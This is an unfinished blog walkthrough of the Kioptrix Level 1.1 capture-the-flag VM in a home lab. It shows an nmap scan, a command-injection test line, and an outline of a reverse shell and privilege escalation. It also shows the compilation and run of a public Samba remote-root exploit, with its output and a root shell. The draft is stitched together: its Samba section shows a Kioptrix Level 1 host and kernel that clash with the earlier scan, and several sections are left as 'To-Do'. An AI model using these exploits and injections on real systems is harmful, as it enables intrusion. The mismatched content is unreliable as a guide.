---
layout: post
title: Kioptrix Level 1.1 (#2) Walkthrough
date: 2018-10-19
excerpt: "Kioptrix 2 Write-Up"
tags: [ctf, cybersec, kioptrix, nmap, metasploit, sql_injection]
comments: true
---

# Kioptrix Level 1.1 (#2)
Kioptrix consists of five capture-the-flag virtual machine challenges. I intend to write about my methodology of solving each of them in time. This is the second. These have been solved many times by people before me, but I feel they represent a good challenge and that documenting my efforts is key to learning.

You can find the VM for download over at [Vulnhub](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/).

Anyone wishing to run Kioptrix 1.1 in Virtualbox should consult [this setup guide](https://www.hypn.za.net/blog/2017/07/15/running-kioptrix-level-1-and-others-in-virtualbox/).

## My Setup
Currently, I run Kali in a VM using Virtualbox. I have Kioptrix 1.1 and any other CTF VMs on a shared NatNetwork with Kali. This way Kali can access the internet and see the VMs. It also keeps everything behind NAT.

*Note: I have my NatNetwork set with a DHCP server with an IP address range of 10.0.2.0/24*

## VM Discovery
We'll need to get the IP address of the target before we can interact with it.

{% highlight bash %}
Currently scanning: Finished!   |   Screen View: Unique Hosts                 

4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240               
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
...
10.0.2.6        08:00:27:c9:82:b4      1      60  PCS Systemtechnik GmbH
{% endhighlight %}

I chose to ping 10.0.2.6 to ensure it's our target; I only have Kali and the VM running, so a response means it's our target.

## Port Scanning
Let's see what's available to us over the network using Nmap.
I like to run the following arguments on local VMs:
* -p- | All ports (1-65535)
* -sV | Service Scan, taking guesses at what services are running on the target. Invaluable.
* -A  | OS Detection. Useful, as some exploits are version-dependent.

{% highlight bash %}
root@kali:~# nmap -p- -A -sV 10.0.2.6
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-19 14:43 EDT
Nmap scan report for 10.0.2.6
Host is up (0.00036s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
...
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            742/udp  status
|_  100024  1            745/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
...
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
745/tcp  open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 08:00:27:C9:82:B4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
...
{% endhighlight %}

There's a lot of info, but here's the important parts:
1. OpenSSH 3.9p1 on Port 22.
2. Apache 2.0.52 on Ports 80 and 443
3. RPCBind and Status on Ports 111, 742, 745
4. CUPS 1.1 on Port 631
5. MySQL on its usual Port 3306.

In addition to these, we can see the target is a release of CentOS, with a linux kernel version between 2.6.9 and 2.6.30.

## Apache Webserver
Let's see what Apache in running. Going to the IP directly in Firefox shows a basic login form.

<screenshot of it>

Let's see if this is vulnerable to SQL injection.


## The second page.
Bypassing the login form reveals a form that lets us ping a machine on the network. This doesn't seem to have a useful purpose, so we're probably meant to use this to run something else, a la Command Injection.

Trying the bash semicolon separator lets us run a command in addition to ping.

<ping 127.0.0.1; whoami>
<screenshot of it showing ping and "apache">

## Getting a shell
Let's set up netcat on our end to catch the shell coming from the target.

<netcat command>

We can use the tried and true bash redirection shell, like so.
It's courtesy of <page>

Voila! We can now run commands on the system as Apache.

Now, let's investigate the target some more.

## Determining CentOS release
<command to get release info>

So, we're running CentOS 4.5. Let's see if we can find an exploit for it.

There's a privilege escalation exploit that it's vulnerable to.
<link>

I have tried to use wget to grab it from ExploitDB, but even with telling it not to check the certificate, it won't download.

So let's host it on our Kali machine and wget it from there.

<kali>
wget exploit
spawn webserver using simplehttpserver

<target>
wget from attacker IP
gcc it
run it

Now we're running as root. Let's hunt for the flag.
cd /
ls
cd /root
ls

There it is
cat proof.txt

















## Enumeration 4 Linux
Enum4Linux is another enumeration tool to reveal as much information as possible from a Linux target.

{% highlight bash %}
root@kali~# enum4linux 10.0.2.6
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Sep 24 20:32:09 2018

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.0.2.6
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

...
 ==================================
|    OS information on 10.0.2.6    |
 ==================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.0.2.6 from smbclient:
[+] Got OS info for 10.0.2.6 from srvinfo:
	KIOPTRIX       Wk Sv PrQ Unx NT SNT Samba Server
	platform_id     :	500
	os version      :	4.5
	server type     :	0x9a03
...
 =====================================
|    Share Enumeration on 10.0.2.6    |
 =====================================

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (Samba Server)
	ADMIN$          IPC       IPC Service (Samba Server)
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------
	KIOPTRIX             Samba Server

	Workgroup            Master
	---------            -------
	MYGROUP              KIOPTRIX

...

enum4linux complete on Mon Sep 24 20:32:19 2018
{% endhighlight %}

Others have had luck with enum4linux identifying the Samba server version against this VM, but I've had no such luck.

## Service Investigation
### OpenSSH
To-Do

### Apache
To-Do

### Samba
If you aren't aware of [Metasploit](https://www.metasploit.com/), it contains many exploits, scanners, and other wonderful tools. We're going to make use of its Samba scanner.

{% highlight bash %}
root@kali~# msfconsole
...
msf > grep smb search scanner
...
auxiliary/admin/smb/check_dir_file               normal  SMB Scanner Check File/Directory Utility
...
auxiliary/scanner/smb/smb_version                normal  SMB Version Detection

{% endhighlight %}

*Note: I used 'grep smb search scanner' to filter the results of 'search scanner' to only those with 'smb' in them.*

The bottom one is what we want to use, as we want to know the version of the Samba (SMB) server.

{% highlight bash %}
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads
{% endhighlight %}

The important piece is RHOSTS, our target.

{% highlight bash %}
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.0.2.6
RHOSTS => 10.0.2.6
msf auxiliary(scanner/smb/smb_version) > run

[.] 10.0.2.6:139          - Host could not be identified: Unix (Samba 2.2.1a)
[.] Scanned 1 of 1 hosts (100% complete)
[.] Auxiliary module execution completed
{% endhighlight %}

And there's our target's Samba version: 2.2.1a. Let's search for an exploit, preferably RCE.
{% highlight bash %}
msf auxiliary(scanner/smb/smb_version) > exit
root@kali~# searchsploit samba | grep 2.2 # Searching for Samba exploits, filtering for version 2.2.x
...
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer | exploits/linux/remote/16321.rb
Samba 2.2.8 (Linux x86) - 'trans2open' Remote | exploits/linux_x86/remote/16861.rb
Samba 2.2.x - 'call_trans2open' Remote Buffer | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer | exploits/unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Meta | exploits/linux/remote/9936.rb
Samba 2.2.x - Remote Buffer Overflow          | exploits/linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execu | exploits/multiple/remote/10.c
...
{% endhighlight %}

The "Remote Code Execution" one sounds good. Let's try it.
For reference, Kali keeps a local copy of ExploitDB in /usr/share/exploitdb.

{% highlight bash %}
root@kali~# cp /usr/share/exploitdb/exploits/multiple/remote/10.c 10.c # grab a copy of the exploit code
root@kali~# gcc 10.c # compile using GCC
root@kali~# ./a.out
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./a.out [-bBcCdfprsStv] [host]

-b <platform>   bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>       bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>      bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode
{% endhighlight %}

Let's set our options according. Our target is Linux, the port is 139, host is 10.0.2.6 (in my case).

{% highlight bash %}
root@kali~# ./a.out -b 0 10.0.2.6
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
{% endhighlight %}

Success! We've got a root shell on the host.

### rpcbind / status
To-Do

## Finding the flag
To-Do

## Conclusions
To-Do



Used searchsploit to find exploits

searchsploit samba 2.2

The last one looked promisng
"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | exploits/multiple/remote/10.c"

Copied the file to pwd, ran gcc on it, then a quick
./a.out 10.0.2.6
worked great. Instant root.
